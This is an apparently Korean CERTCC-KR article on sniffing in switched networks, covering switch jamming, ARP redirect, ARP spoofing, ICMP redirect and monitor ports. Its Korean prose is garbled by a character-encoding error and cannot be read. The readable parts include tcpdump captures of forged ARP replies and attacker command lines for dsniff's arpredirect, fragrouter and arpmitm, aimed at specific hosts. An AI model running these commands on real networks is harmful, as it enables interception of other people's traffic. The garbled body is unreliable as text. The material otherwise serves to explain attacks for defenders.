½ºÀ§Äª ȯ°æ¿¡¼­ÀÇ ½º´ÏÇÎ ±â¹ý ÀϹÝÀûÀ¸·Î ¾Õ¼­ ¼³¸íÇÑ ½º´ÏÇÎÀ» ¹æÁöÇÏ´Â ¹æ¹ýÀ¸·Î ½ºÀ§Äª Çãºê¸¦ »ç¿ëÇÏ°Ô µÈ´Ù. ½ºÀ§Äª Çãºê´Â ·ÎÄà ³×Æ®¿öÅ©¸¦ ¿©·¯°³ÀÇ ¼¼Å©¸ÕÆ®·Î ³ª´©¾î ¾µ ¼ö ÀÖµµ·Ï Çϴµ¥, °¢ ¼¼±×¸ÕÆ®³»ÀÇ Æ®·¡ÇÈÀº ´Ù¸¥ ¼¼±×¸ÕÆ®·Î Àü´ÞµÇÁö ¾Ê´Â´Ù. µû¶ó¼­ ½ºÀ§Äª Çãºê¸¦ ÀÌ¿ëÇÏ¿© ¾÷¹«º°·Î ¶Ç´Â µ¶¸³ÀûÀÎ »çÀÌÆ®º°·Î ³×Æ®¿öÅ©¸¦ ³ª´©¾î ³õÀ¸¸é ´Ù¸¥ ³×Æ®¿öÅ© ¼¼±×¸ÕÆ®³»ÀÇ ³×Æ®¿öÅ© Æ®·¡ÇÈÀ» µµÃ»ÇÒ ¼ö ¾ø°Ô µÈ´Ù. ÇÏÁö¸¸ Switch Jamming, ARP Redirct³ª ICMP Redirct µîÀÇ ±â¹ýÀ» ÀÌ¿ëÇÏ¿© ´Ù¸¥ ³×Æ®¿öÅ© ¼¼±×¸ÕÆ®ÀÇ µ¥ÀÌÅ͸¦ ½º´ÏÇÎ ÇÒ ¼ö ÀÖ´Â ¹æ¹ýµµ ÀÖ´Ù. 1. Switch Jamming ¸¹Àº Á¾·ùÀÇ ½ºÀ§Ä¡µéÀº ÁÖ¼Ò Å×À̺íÀÌ °¡µæÂ÷°Ô µÇ¸é(Full) ¸ðµç ³×Æ®¿öÅ© ¼¼±×¸ÕÆ®·Î Æ®·¹ÇÈÀ» ºê·ÎµåÄɽºÆÃÇÏ°Ô µÈ´Ù. µû¶ó¼­ °ø°ÝÀÚ´Â À§Á¶µÈ MAC ÁÖ¼Ò¸¦ Áö¼ÓÀûÀ¸·Î ³×Æ®¿öÅ©¿¡ È긲À¸·Î¼­ ½ºÀ§Äª ÇãºêÀÇ ÁÖ¼Ò Å×À̺íÀ» ¿À¹öÇÃ·Î¿ì ½ÃÄÑ ´Ù¸¥ ³×Æ®¿öÅ© ¼¼±×¸ÕÆ®ÀÇ µ¥ÀÌÅ͸¦ ½º´ÏÇÎ ÇÒ ¼ö ÀÖ°Ô µÈ´Ù. ÀÌ´Â º¸¾È ¿ø¸®ÀÇ ÇϳªÀÎ "Fail close (½Ã½ºÅÛ¿¡ ÀÌ»óÀÌ ÀÖÀ» °æ¿ì º¸¾È±â´ÉÀÌ ¹«·ÂÈ­µÇ´Â °ÍÀ» ¹æÁöÇÏ´Â ¿ø¸®)"¸¦ µû¸£Áö ¾Ê±â ¶§¹®¿¡ ¹ß»ýÇÑ´Ù. ½ºÀ§Ä¡µéÀº »ç½Ç»ó º¸¾Èº¸´Ù´Â ±â´É°ú ¼º´É À§ÁÖ·Î µðÀÚÀÎ µÇ¾î ÀÖ´Ù. ´ÙÀ½Àº arp flooding °ø°ÝÀ» ÇÒ ¶§ ¹ß»ýÇÏ´Â ÀÓÀÇÀÇ arp ÆÐŶÀ» tcpdump¸¦ ÀÌ¿ëÇÏ¿© ÀâÀº°ÍÀÌ´Ù. °ø°ÝÀÚ°¡ ¸¸µé¾î³½ ÀÌ·¯ÇÑ ÀÓÀÇÀÇ arp ÆÐŶÀÇ MAC ÁÖ¼Ò´Â ½ºÀ§Ä¡ÀÇ ÁÖ¼Ò Å×À̺íÀ» ¿À¹öÇÃ·Î¿ì ½ÃÅ°°Ô µÈ´Ù. [root@consult /root]# tcpdump -e arp tcpdump: listening on eth0 07:44:23.898915 79:94:74:11:d7:dc bc:47:d8:7b:31:51 arp 42: arp reply 82.195.6.82 is-at 79:94:74:11:d7:dc 07:44:23.898954 b8:29:3:9c:9e:5c 3f:cf:9b:70:fa:14 arp 42: arp reply 204.227.135.56 is-at b8:29:3:9c:9e:5c 07:44:23.898991 5:6f:25:db:4b:76 97:a0:d6:c7:f1:8f arp 42: arp reply 158.81.199.91 is-at 5:6f:25:db:4b:76 07:44:23.899027 f0:f4:2c:8f:50:f7 a6:ca:21:a1:dd:26 arp 42: arp reply 114.215.48.176 is-at f0:f4:2c:8f:50:f7 07:44:23.899063 10:3:1:5b:78:9f de:d0:b:d0:60:fa arp 42: arp reply 171.63.250.67 is-at 10:3:1:5b:78:9f 07:44:23.899099 c4:8c:89:15:83:fb 7d:cc:32:5b:f2:42 arp 42: arp reply 235.178.172.145 is-at c4:8c:89:15:83:fb 07:44:23.899136 5d:f2:9d:d4:92:49 5d:95:c2:bd:8f:86 arp 42: arp reply 19.140.139.241 is-at 5d:f2:9d:d4:92:49 07:44:23.899172 49:19:9a:cc:14:85 8c:49:56:7e:8b:b2 arp 42: arp reply 127.191.23.251 is-at 49:19:9a:cc:14:85 07:44:23.899209 71:28:86:3:70:99 90:4e:aa:20:d3:f2 arp 42: arp reply 143.251.139.236 is-at 71:28:86:3:70:99 ... 2. ARP Redirect °ø°Ý ¸ÕÀú Á¤»óÀûÀÎ ARP Protocol¿¡ ´ëÇÏ¿© ¼³¸íÇÑ´Ù. IP µ¥ÀÌÅÍ ±×·¥¿¡¼­ IP ÁÖ¼Ò´Â 32 bit ±¸Á¶·Î µÇ¾î ÀÖ°í ÀÌ´õ³Ý ÁÖ¼Ò(MAC ÁÖ¼Ò)´Â 48 bitÀÇ Å©±â¸¦ °®´Â´Ù. ´Ù¸¥ È£½ºÆ®·Î ftp³ª telnet µî°ú °°Àº ³×Æ®¿öÅ© ¿¬°áÀ» Çϱâ À§Çؼ­´Â »ó´ë¹æ È£½ºÆ®ÀÇ ÀÌ´õ³Ý ÁÖ¼Ò¸¦ ¾Ë¾Æ¾ß ÇÑ´Ù. Áï, »ç¿ëÀÚ´Â IP ÁÖ¼Ò¸¦ ÀÌ¿ëÇÏ¿© ¿¬°áÀ» ÇÏÁö¸¸ ÀÌ´õ³Ý»ó¿¡¼­´Â ÀÌ´õ³Ý ÁÖ¼Ò¸¦ ÀÌ¿ëÇÏ°Ô µÈ´Ù. À̸¦ À§ÇÏ¿© IPÁÖ¼Ò¸¦ ÀÌ´õ³Ý ÁÖ¼Ò·Î º¯È¯½ÃÄÑ ÁÖ¾î¾ß Çϴµ¥ À̸¦ ARP(Address Resolution Protocol)¶ó ÇÑ´Ù. ±×¸®°í ±× ¿ª °úÁ¤À» RARP(Reverse Address Resolution Protocol)¶ó ÇÑ´Ù. ARP¸¦ ÀÌ¿ëÇÏ¿© »ó´ë È£½ºÆ®ÀÇ ÀÌ´õ³Ý ÁÖ¼Ò¸¦ ¾Ë¾Æ³»´Â °úÁ¤Àº ´ÙÀ½°ú °°´Ù. ¨ç ¸ÕÀú ³×Æ®¿öÅ©³»ÀÇ ¸ðµç È£½ºÆ®¿¡ "ARP Request"¶ó°í ºÒ¸®´Â ÀÌ´õ³Ý ÇÁ·¹ÀÓÀ» º¸³½´Ù. ¿¬°áÇÏ°íÀÚ Çϴ ȣ½ºÆ®ÀÇ IP ÁÖ¼Ò¸¦ Æ÷ÇÔÇÑ ARP Request´Â ÀÌ´õ³Ý»óÀÇ ¸ðµç ´Ù¸¥ È£½ºÆ®µé¿¡°Ô "ÀÌ IP ÁÖ¼Ò¸¦ »ç¿ëÇϴ ȣ½ºÆ®´Â ³ª¿¡°Ô Çϵå¿þ¾î ÁÖ¼Ò(ÀÌ´õ³Ý ÁÖ¼Ò)¸¦ ¾Ë·ÁÁֽÿÀ"¶ó´Â Àǹ̸¦ °®´Â´Ù. ¨è ARP Request¸¦ ¹ÞÀº È£½ºÆ® Áß ÇØ´ç IP¸¦ »ç¿ëÇϴ ȣ½ºÆ®´Â ÀÚ½ÅÀÇ Çϵå¿þ¾î ÁÖ¼Ò(ÀÌ´õ³Ý ÁÖ¼Ò)¸¦ ARP Request¸¦ º¸³½ È£½ºÆ®¿¡°Ô¸¸ º¸³»ÁÖ°Ô µÇ´Âµ¥ À̸¦ ARP Reply¶ó°í ÇÑ´Ù. ¨é ÀÌÈÄ µÎ È£½ºÆ®°£ÀÇ Åë½Å(ftp, telnet µî)À» À§ÇÏ¿© »ó´ë¹æÀÇ ÀÌ´õ³Ý ÁÖ¼Ò¸¦ »ç¿ëÇÏ°Ô µÇ¸ç, IP datagramÀ» ¼Û¼ö½ÅÇÒ ¼ö ÀÖ°Ô µÈ´Ù. ´ÙÀ½ ±×¸²Àº ARP Request¿Í ARP ReplyÀÇ °úÁ¤À» º¸¿©ÁÖ°í ÀÖ´Ù. ´ÙÀ½Àº ½ÇÁ¦·Î 172.16.2.15 ¹ø È£½ºÆ®¿¡¼­ 172.16.2.26¹øÀ¸·Î pingÀ» ÇßÀ» °æ¿ì ³ªÅ¸³ª´Â arp Æ®·¡ÇÈÀÌ´Ù. arp request/reply¸¦ ±³È¯ÇÑ µÎ È£½ºÆ®´Â »ó´ë¹æÀÇ MAC ÁÖ¼Ò¸¦ °¢°¢ÀÇ arp cache¿¡ ÀúÀåÇÏ°Ô µÈ´Ù. µû¶ó¼­ ¸¶Áö¸· ¶óÀο¡¼­ 172.16.2.26¹ø È£½ºÆ®°¡ 15¹ø È£½ºÆ®·Î echo reply¸¦ º¸³¾¶§´Â arp request/reply °úÁ¤À» °ÅÄ¡Áö ¾Ê¾Æµµ µÈ´Ù. [root@consult /root]# tcpdump -e host 172.16.2.26 tcpdump: listening on eth0 18:16:25.880837 0:0:e8:76:e8:bb Broadcast arp 60: arp who-has 172.16.2.26 tell 172.16.2.15 18:16:25.881021 0:c0:26:27:b:1c 0:0:e8:76:e8:bb arp 60: arp reply 172.16.2.26 is-at 0:c0:26:27:b:1c 18:16:25.881243 0:0:e8:76:e8:bb 0:c0:26:27:b:1c ip 74: 172.16.2.15 > 172.16.2.26: icmp: echo request 18:16:25.881407 0:c0:26:27:b:1c 0:0:e8:76:e8:bb ip 74: 172.16.2.26 > 172.16.2.15: icmp: echo reply "ARP Redirect" °ø°ÝÀº À§Á¶µÈ arp reply¸¦ º¸³»´Â ¹æ¹ýÀ» »ç¿ëÇÑ´Ù. Áï °ø°ÝÀÚ È£½ºÆ®°¡ "³ªÀÇ MAC ÁÖ¼Ò°¡ ¶ó¿ìÅÍÀÇ MAC ÁÖ¼ÒÀÌ´Ù"¶ó´Â À§Á¶µÈ arp reply¸¦ ºê·ÎµåÄɽºÆ®·Î ³×Æ®¿öÅ©¿¡ ÁÖ±âÀûÀ¸·Î º¸³»¾î, ½ºÀ§Äª ³×Æ®¿öÅ©»óÀÇ ´Ù¸¥ ¸ðµç È£½ºÆ®µéÀÌ °ø°ÝÀÚ È£½ºÆ®¸¦ ¶ó¿ìÅÍ·Î ¹Ï°Ô²ûÇÑ´Ù. °á±¹ ¿ÜºÎ ³×Æ®¿öÅ©¿ÍÀÇ ¸ðµç Æ®·¡ÇÈÀº °ø°ÝÀÚ È£½ºÆ®¸¦ ÅëÇÏ¿© Áö³ª°¡°Ô µÇ°í °ø°ÝÀÚ´Â ½º´ÏÆÛ¸¦ ÅëÇÏ¿© ÇÊ¿äÇÑ Á¤º¸¸¦ µµÃ»ÇÒ ¼ö ÀÖ°Ô µÈ´Ù. ¡Ø ARP Protocol specification¿¡ ÀÇÇϸé ÀÌ¹Ì cache¿¡ ÀúÀåÇÏ°í ÀÖ´Â IP¿¡ ´ëÇÑ ARP request¸¦ ¹Þ°ÔµÇ¸é È£½ºÆ®´Â ARP request¸¦ º¸³½ È£½ºÆ®ÀÇ MAC ÁÖ¼Ò¸¦ cahe¿¡ ¾÷µ¥ÀÌÆ® ÇÏ°Ô µÈ´Ù°í ³ª¿Í ÀÖ´Ù. ±×¸®°í ÀÌ·¯ÇÑ cacheÀÇ ¾÷µ¥ÀÌÆ® ±â´ÉÀº arp reply¿¡µµ Àû¿ëµÇ´Â °ÍÀ¸·Î º¸À̸ç, À§ÀÇ °ø°ÝÀÌ ¼º°øÇÒ ¼ö ÀÖ´Â ¿äÀÎÀÌ µÈ´Ù. ÇÏÁö¸¸ ½Ã½ºÅÛ¿¡ µû¶ó ´Ù¸¦ ¼öµµ ÀÖ´Ù. À̶§ °ø°Ý È£½ºÆ®´Â IP Forwarding ±â´ÉÀ» ¼³Á¤ÇÏ¿©¾ß °ø°Ý È£½ºÆ®·Î ¿À´Â ¸ðµç Æ®·¡ÇÈÀ» ¿ø·¡ÀÇ °ÔÀÌÆ®¿þÀÌ·Î Forwarding ÇØÁÙ ¼ö ÀÖ´Ù. ±×·¸Áö ¾ÊÀ¸¸é ¿ÜºÎ·Î ³ª°¡´Â ¸ðµç ³×Æ®¿öÅ© ¿¬°áÀÌ ²÷¾îÁö°Ô µÈ´Ù. ´ÙÀ½Àº "arpredirect"¶ó´Â °ø°Ý ÇÁ·Î±×·¥À¸·Î °ø°ÝÇßÀ» ¶§ ³×Æ®¿öÅ©»ó¿¡ ³ªÅ¸³ª´Â arp ÆÐŶÀ» tcpdump¸¦ ÀÌ¿ëÇÏ¿© ÀâÀº ¸ð½ÀÀÌ´Ù. °ø°ÝÀÌ ³¡³¯¶§´Â ¿ø·¡ÀÇ arp ¸ÅÇÎÀ» º¹¿øÇÏ¿© ³×Æ®¿öÅ© ¿¬°áÀÌ ²÷¾îÁöÁö ¾Êµµ·Ï ÇÏ°í ÀÖ´Ù. [root@consult dsniff-1.8]# arpredirect 172.16.2.1 intercepting traffic from LAN to 172.16.2.1 (^C to exit)... restoring original ARP mapping for 172.16.2.1 [root@consult dsniff-1.8]# [root@consult /root]# tcpdump -e arp (°ø°ÝÀÚ È£½ºÆ®°¡ ¶ó¿ìÅÍ·Î °¡ÀåÇÏ´Â °ø°Ý) 15:29:36.887943 0:50:da:d3:1f:d3 Broadcast arp 60: arp reply 172.16.2.1 is-at 0:50:da:d3:1f:d3 15:29:38.895089 0:50:da:d3:1f:d3 Broadcast arp 60: arp reply 172.16.2.1 is-at 0:50:da:d3:1f:d3 15:30:01.005097 0:50:da:d3:1f:d3 Broadcast arp 60: arp reply 172.16.2.1 is-at 0:50:da:d3:1f:d3 15:30:05.025086 0:50:da:d3:1f:d3 Broadcast arp 60: arp reply 172.16.2.1 is-at 0:50:da:d3:1f:d3 (°ø°ÝÀÚ MAC) (¶ó¿ìÅÍ IP) (°ø°ÝÀÚÀÇ MAC) ... (°ø°ÝÀÌ ³¡³¯ ¶§ ³×Æ®¿öÅ©¸¦ º¹¿øÇÏ´Â °úÁ¤) 15:52:55.025088 0:60:2f:a3:9a:1c Broadcast arp 60: arp reply 172.16.2.1 is-at 0:60:2f:a3:9a:1c 15:52:57.035050 0:60:2f:a3:9a:1c Broadcast arp 60: arp reply 172.16.2.1 is-at 0:60:2f:a3:9a:1c 15:52:59.045050 0:60:2f:a3:9a:1c Broadcast arp 60: arp reply 172.16.2.1 is-at 0:60:2f:a3:9a:1c (¶ó¿ìÅÍ MAC) (¶ó¿ìÅÍ IP) (¶ó¿ìÅÍ MAC) ¡Ø À§Á¶µÈ ÆÐŶÀ» ÁÖ±âÀûÀ¸·Î º¸³»´Â ÀÌÀ¯´Â ´Ù¸¥ È£½ºÆ®ÀÇ arp cache¸¦ Áö¼ÓÀûÀ¸·Î À§Á¶Çϱâ À§Çؼ­ ÀÌ´Ù. À§¿Í °°Àº °ø°ÝÀ» ÇÏ°ÔµÇ¸é ´Ù¸¥ ¸ðµç È£½ºÆ®µéÀº °ø°ÝÀÚ È£½ºÆ®¸¦ ¶ó¿ìÅÍ·Î ÀνÄÇÏ°í ¿ÜºÎ·Î ¿¬°áµÇ´Â ¸ðµç Æ®·¡ÇÈÀ» °ø°Ý È£½ºÆ®·Î º¸³»°Ô µÇ´Âµ¥ À̶§ °ø°ÝÀÚ´Â ´ÙÀ½°ú °°ÀÌ IP Forwarding ±â´ÉÀ» ÀÌ¿ëÇÏ¿© ¿ø·¡ÀÇ ¸ñÀûÁö·Î ÆÐŶÀ» Forwarding Çؾ߸¸ ³×Æ®¿öÅ©°¡ ²÷¾îÁöÁö ¾Ê°ÔµÇ°í, °ø°ÝÀÚ´Â Áö³ª°¡´Â ÆÐŶÀ» ½º´ÏÇÎÇÒ ¼ö ÀÖ´Ù. [root@consult fragrouter-1.6]# ./fragrouter -B1 fragrouter: base-1: normal IP forwarding 172.16.2.15.1297 > 203.233.150.11.23: . ack 390289256 win 7636 (DF) 172.16.2.142.1287 > 203.233.150.11.53: udp 36 172.16.2.142.1288 > 210.116.114.147.80: S 13774318:13774318(0) win 8192 (DF) 172.16.2.15.1297 > 203.233.150.11.23: . ack 390289317 win 7575 (DF) 172.16.2.15.1300 > 203.233.150.39.23: . ack 1685228460 win 7865 (DF) 172.16.2.142.1288 > 210.116.114.147.80: . ack 97085742 win 8760 (DF) 172.16.2.142.1288 > 210.116.114.147.80: P 13774319:13774505(186) ack 97085742 win 8760 (DF) ... 3. ARP spoofing °ø°Ý ARP redirect¿Í ºñ½ÁÇÑ °ø°Ý ¹æ¹ýÀ¸·Î ´Ù¸¥ ¼¼±×¸ÕÆ®¿¡ Á¸ÀçÇϴ ȣ½ºÆ®°£ÀÇ Æ®·¡ÇÈÀ» ½º´ÏÇÎÇÏ°íÀÚ ÇÒ ¶§ »ç¿ëµÈ´Ù. °ø°ÝÀÚ´Â ÀÚ½ÅÀÇ MAC ÁÖ¼Ò¸¦ ½º´ÏÇÎÇÏ°íÀÚ ÇÏ´Â µÎ È£½ºÆ®ÀÇ MAC ÁÖ¼Ò·Î À§ÀåÇÏ´Â arp reply(¶Ç´Â request) ÆÐŶÀ» ³×Æ®¿öÅ©¿¡ »Ñ¸°´Ù. Áï "³ªÀÇ(°ø°ÝÀÚÀÇ) MAC ÁÖ¼Ò°¡ ½º´ÏÇÎÇÏ°íÀÚ Çϴ ȣ½ºÆ®ÀÇ MAC ÁÖ¼ÒÀÌ´Ù"¶ó´Â arp reply¸¦ °¢ °¢ÀÇ È£½ºÆ®¿¡°Ô º¸³»°Ô µÈ´Ù. ÀÌ·¯ÇÑ arp reply¸¦ ¹ÞÀº µÎ È£½ºÆ®´Â ÀÚ½ÅÀÇ arp cache¸¦ ¾÷µ¥ÀÌÆ® ÇÏ°Ô µÇ°í, µÎ È£½ºÆ®°£¿¡ ¿¬°áÀÌ ÀϾ ¶§ °ø°ÝÀÚ È£½ºÆ®ÀÇ MAC ÁÖ¼Ò¸¦ »ç¿ëÇÏ°Ô µÈ´Ù. °á±¹ µÎ È£½ºÆ®°£ÀÇ ¸ðµç Æ®·¢ÇÈÀº °ø°ÝÀÚ°¡ À§Ä¡ÇÑ ¼¼±×¸ÕÆ®·Î µé¾î¿À°Ô µÈ´Ù. ÀÌ·¯ÇÑ °æ¿ì arp redirect °ø°Ý°ú ¸¶Âù°¡Áö·Î °ø°ÝÀÚ È£½ºÆ®·Î ³Ñ¾î¿À´Â Æ®·¡ÇÈÀ» º»·¡ÀÇ È£½ºÆ®·Î relay ÇØÁÖ¾î¾ß¸¸ µÎ È£½ºÆ® °£¿¡ Á¤»óÀûÀÎ ¿¬°áÀ» ÇÒ ¼ö ÀÖ°Ô µÇ°í ½º´ÏÇεµ ÇÒ ¼ö ÀÖ´Ù. ±×·¸Áö ¾ÊÀ¸¸é µÎ È£½º°£ÀÇ ¿¬°áÀº ÀÌ·ç¾î Áú ¼ö ¾ø°Ô µÇ°í °á±¹ ½º´ÏÇεµ ÇÒ ¼ö ¾ø°Ô µÈ´Ù. ´ÙÀ½Àº "arpmitm"À̶ó´Â °ø°Ý ÇÁ·Î±×·¥À» ÀÌ¿ëÇÏ¿© 172.16.2.15¿Í 172.16.2.18¹ø È£½ºÆ®°£ÀÇ Æ®·¡ÇÈÀ» ½º´ÏÇÎ Çϱâ À§ÇÑ °ø°ÝÇßÀ» ¶§ ³×Æ®¿öÅ©»ó¿¡ ³ªÅ¸³ª´Â arp ÆÐŶÀ» tcpdump¸¦ ÀÌ¿ëÇÏ¿© ÀâÀº ¸ð½ÀÀÌ´Ù. Usage: ./arpmitm [root@consult]# ./arpmitm 172.16.2.15 00:00:E8:76:E8:BB 172.16.2.18 00:C0:26:28:F9:C7 00:50:DA:D3:1F:D3 (15¹øÀÇ MAC) (18¹øÀÇ MAC) (°ø°ÝÀÚÀÇ MAC) /* * ARP MITM attack tool. (c) xdr 2000 * $Id: arpmitm.c,v 1.2 2000/03/28 21:26:48 xdr Exp $ */ --- Starting ARP MITM --- endpoint-1 (172.16.2.15) at 00:00:E8:76:E8:BB [ether] on eth0 endpoint-2 (172.16.2.18) at 00:C0:26:28:F9:C7 [ether] on eth0 ------------------------- [0x0]: Sending mitm to: endpoint-1 endpoint-2 [0x1]: Sending mitm to: endpoint-1 endpoint-2 ... [root@consult tools]# tcpdump -e arp tcpdump: listening on eth0 (°ø°ÝÀÚ È£½ºÆ®°¡ Target È£½ºÆ®·Î °¡ÀåÇÏ´Â °ø°Ý) ([0x0]: Sending mitm to: endpoint-1 endpoint-2¿¡ ÇØ´çÇÏ´Â ÆÐŶ) 16:38:30.915146 0:50:da:d3:1f:d3 0:c0:26:28:f9:c7 arp 42: arp reply 172.16.2.15 is-at 0:50:da:d3:1f:d3 16:38:31.225158 0:50:da:d3:1f:d3 0:0:e8:76:e8:bb arp 42: arp reply 172.16.2.18 is-at 0:50:da:d3:1f:d3 ([0x1]: Sending mitm to: endpoint-1 endpoint-2¿¡ ÇØ´çÇÏ´Â ÆÐŶ) 16:38:41.545139 0:50:da:d3:1f:d3 0:c0:26:28:f9:c7 arp 42: arp reply 172.16.2.15 is-at 0:50:da:d3:1f:d3 (°ø°ÝÀÚ MAC) (18¹ø È£½ºÆ® MAC) (°ø°ÝÀÚ MAC) 16:38:41.855131 0:50:da:d3:1f:d3 0:0:e8:76:e8:bb arp 42: arp reply 172.16.2.18 is-at 0:50:da:d3:1f:d3 (°ø°ÝÀÚ MAC) (15¹ø È£½ºÆ® MAC) (°ø°ÝÀÚ MAC) ... ¡Ø À§Á¶µÈ ÆÐŶÀ» ÁÖ±âÀûÀ¸·Î º¸³»´Â ÀÌÀ¯´Â Target È£½ºÆ®ÀÇ arp cache¸¦ Áö¼ÓÀûÀ¸·Î À§Á¶Çϱâ À§Çؼ­ ÀÌ´Ù. 4. ICMP Redirect °ø°Ý ICMP(Internet Control Message Protocol)´Â ³×Æ®¿öÅ© ¿¡·¯ ¸Þ½ÃÁö¸¦ Àü¼ÛÇϰųª ³×Æ®¿öÅ© È帧À» ÅëÁ¦Çϱâ À§ÇÑ ÇÁ·ÎÅäÄÝÀε¥ ICMP Redirect¸¦ ÀÌ¿ëÇؼ­ ½º´ÏÇÎ ÇÒ ¼ö ÀÖ´Â ¹æ¹ýÀÌ Á¸ÀçÇÑ´Ù. ICMP Redirect ¸Þ½ÃÁö´Â ÇϳªÀÇ ³×Æ®¿öÅ©¿¡ ¿©·¯°³ÀÇ ¶ó¿ìÅÍ°¡ ÀÖÀ» °æ¿ì, È£½ºÆ®°¡ ÆÐŶÀ» ¿Ã¹Ù¸¥ ¶ó¿ìÅÍ¿¡°Ô º¸³»µµ·Ï ¾Ë·ÁÁÖ´Â ¿ªÇÒÀ» ÇÑ´Ù. °ø°ÝÀÚ´Â À̸¦ ¾Ç¿ëÇÏ¿© ´Ù¸¥ ¼¼±×¸ÕÆ®¿¡ Àִ ȣ½ºÆ®¿¡°Ô À§Á¶µÈ ICMP Redirect ¸Þ½ÃÁö¸¦ º¸³» °ø°ÝÀÚÀÇ È£½ºÆ®·Î ÆÐŶÀ» º¸³»µµ·ÏÇÏ¿© ÆÐŶÀ» ½º´ÏÇÎÇÏ´Â ¹æ¹ýÀÌ´Ù. 5. ½ºÀ§Ä¡ÀÇ span/monitor port¸¦ ÀÌ¿ëÇÑ ½º´ÏÇÎ ÀÌ ¹æ¹ýÀº ½ºÀ§Ä¡¿¡ ÀÖ´Â monitor Æ÷Æ®¸¦ ÀÌ¿ëÇÏ¿© ½º´ÏÇÎ ÇÏ´Â ¹æ¹ýÀÌ´Ù. monitor Æ÷Æ®¶õ ½ºÀ§Ä¡¸¦ Åë°úÇÏ´Â ¸ðµç Æ®·¡ÇÈÀ» º¼ ¼ö ÀÖ´Â Æ÷Æ®·Î ³×Æ®¿öÅ© °ü¸®¸¦ À§ÇØ ¸¸µé¾î ³õÀº °ÍÀÌÁö¸¸ °ø°ÝÀÚ°¡ Æ®·¡ÇȵéÀ» ½º´ÏÇÎÇÏ´Â ÁÁÀº Àå¼Ò¸¦ Á¦°øÇÑ´Ù. - From : CERTCC-KR (http://www.certcc.or.kr) -